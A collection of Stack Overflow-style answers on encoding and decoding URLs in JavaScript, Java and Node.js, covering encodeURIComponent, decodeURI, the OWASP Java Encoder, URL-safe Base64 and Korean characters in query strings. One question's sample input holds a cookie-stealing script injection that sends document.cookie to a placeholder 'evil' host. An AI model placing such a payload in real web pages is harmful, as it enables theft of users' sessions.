encode URL so it can be send through GET - javascript

What is the best way to attach URL to query string in javascript? I realize that it needs to be encoded.
I've come across encodeURIComponent() function, which looks like the thing that I want. I am just unsure if it is suitable for this kind of task.
Example usage:
var someURL = encodeURIComponent("http://stackoverflow.com/questions/ask?name=.hil#");
var firstURL = "www.stackoverflow.com/questions?someurl="
firstURL+someURL;

Your choices are encodeURI and encodeURIComponent.
encodeURIComponent is the right choice because you are encoding part of the URL (which happens to be URL-like but that doesn't matter here).
If you were to use encodeURI, it would not convert enough of the characters in the component.

Related

Issue with Decoding %20 from URL

I have found that the following thread provides an extremely useful way to create permalinks or to pass string values via a URL:
Original Thread
Unfortunately, if you wanted to pass the string "test string", for example, to a specific <div> via the URL and display it as simple text, the above thread doesn't seem to decode white space if your URL looks like this:
http://www.abc123.org/subpage.html?test%20string
The code will simply take anything in the URL passed the "?" and it will appear as "simple%20text".
Is there a simple way to do something similar to the Thread's accepted answer so that all %20 can be replaced with white space? Thanks!
You can use decodeURI():
Replaces each escape sequence in the encoded URI with the character
that it represents, but does not decode escape sequences that could
not have been introduced by encodeURI. The character “#” is not
decoded from escape sequences.
const result = decodeURI('http://www.abc123.org/subpage.html?test%20string');
console.log(result);

Does the OWASP Java Encoder have any decoding functions?

I encoded the query string below with the forURIComponent method of the OWASP encoder.
String query = "query=hello'};
window.location = 'http://evil?'+document.cookie;va&r- b = {//]'";
String encodedQuery = Encode.forUriComponent(query);
Now I need to decode encodedQuery, and the decoded string should be exactly equal to the original query. How can I do this?
I assume you're talking about the OWASP Java Encoder. As far as I can tell, it does not supply any decoding functions.
However, since the Encode.forUriComponent() method implements standard URL percent encoding, you can use any correctly implemented URL decoding function to decode it. For example in Java, according to the answers to this question, you could use java.net.URLDecoder.
In JavaScript, decodeURIComponent() should do the trick. If you need to parse a URI containing (possibly) multiple parameters, however, you may find the URL class (or URLSearchParams) more convenient to use.

Two way hashing JSON String in JavaScript for use in URL

I would like to take a JSON string and encrypt/hash/encode it so that I can put it into a URL so that it would resemble something such as seen below:
var stringToEncode = JSON.stringify({foo: 'baz', bar: [1,2,3,4,5], baz: {fizzle: 'buzz'}});
'www.myrandomurl.com/someurl/123fas234asf1543rasfsafda'
I would then like to take that encrypted/hashed/encoded string, and decode it back to its original JSON string so that I can use it to bind to various elements on a single-page AngularJS application.
The contents of the JSON string are not sensitive so security or complex hashing is not required. The only condition is that It needs to be a "URL/URI 'safe'" string that is hashed for vanity purposes like seen above.
I am limited in knowledge of encrypting/encoding however I have thought about simply encoding the string to Base64 and decoding it again.
Is this the best approach? What is a better method if not?
Use encodeURIComponent() to encode it for the url
To decode use the decodeURIComponent() function
Base64 is not URL safe since it can contain non url characters like / + -. (See this question)
If you want your url to not be too similair to the original string you can first covert to base64 and then encode and reverse by decoding and covrrtibg back from base 64
// to url
encodeURIComponent(btoa(str))
// from url
atob(decodeURIComponent(uri))

Websafe encoding of hashed string in nodejs

I am creating a re-director of sorts in nodejs. I have a few values like
userid // superid
these I would like to hash to prevent users from retrieving the url and faking someone else's url and also base64 encode to minimize the length of the url created.
http://myurl.com/~hashedtoken
where un-hashed hashtoken could be something like this
55q322q23
55 = userid
I thought about using crypto library like so:
crypto.createHash('md5').update("55q322q23").digest("base64");
which returns: u/mxNJQaSs2HYJ5wirEZOQ==
The problem here is that I have the / which is not considered websafe so I would like to strip the un-safe letters from the base64 list of letters, somehow. Any ideas about this or perhaps a better solution to the problem at hand?
You could use a so called URL safe variant of Base64. The most common variant, described in RFC 4648, uses - and _ instead of + and / respectively, and omits padding characters (=).
Most implementations of Base64 support this URL safe variant too, though if yours doesn't, it's easy enough to do manually.
Here's what I used. Comments welcome :-)
The important bit is buffer.toString('base64'), then URL-safeing that base64 string with a couple of replace()s.
function newId() {
// Get random string with 20 bytes secure randomness
var crypto = require('crypto');
var id = crypto.randomBytes(20).toString('base64');
// Make URL safe
return id.replace(/\+/g, '-').replace(/\//g, '_').replace(/=+$/, '');
}
Based on the implementation here.
Makes a string safe for URL's and local email addresses (before the #).

How to send Korean characters in URL?

I want to send some Korean values from page1.html on page sumbit to page2.html. But the Korean fonts are getting encoded. Can any one help me with it. I have this meta tag in both the screens.
window.location.href = "page2.html?value='풍경' these Korean character are getting encoded in few mobile devices.
for this page the values is encode as
page2.html?value= %EC%82%EB%AC%BC
Korean characters (and any other non-URL-safe characters) are %-encoded for the transaction. However, when received by the server and put into (for instance) PHP's $_GET array, they are decoded automatically so you don't have to worry about it.
I'm still not completely clear on what you actually asking, but if you correctly construct Url it should be much easier to reason on what should/should not be happening:
// to construct correctly encoded Url:
var encodedValue = encodeURIComponent("'풍경'");
window.location.href = "page2.html?value=" + encodedValue;
// to decode back from query parameter (if needed)
var decoded = decodeURIComponent(encodedValue);
Check out Encode URL in JavaScript? for guidance on encoding Urls with JavaScript.

Categories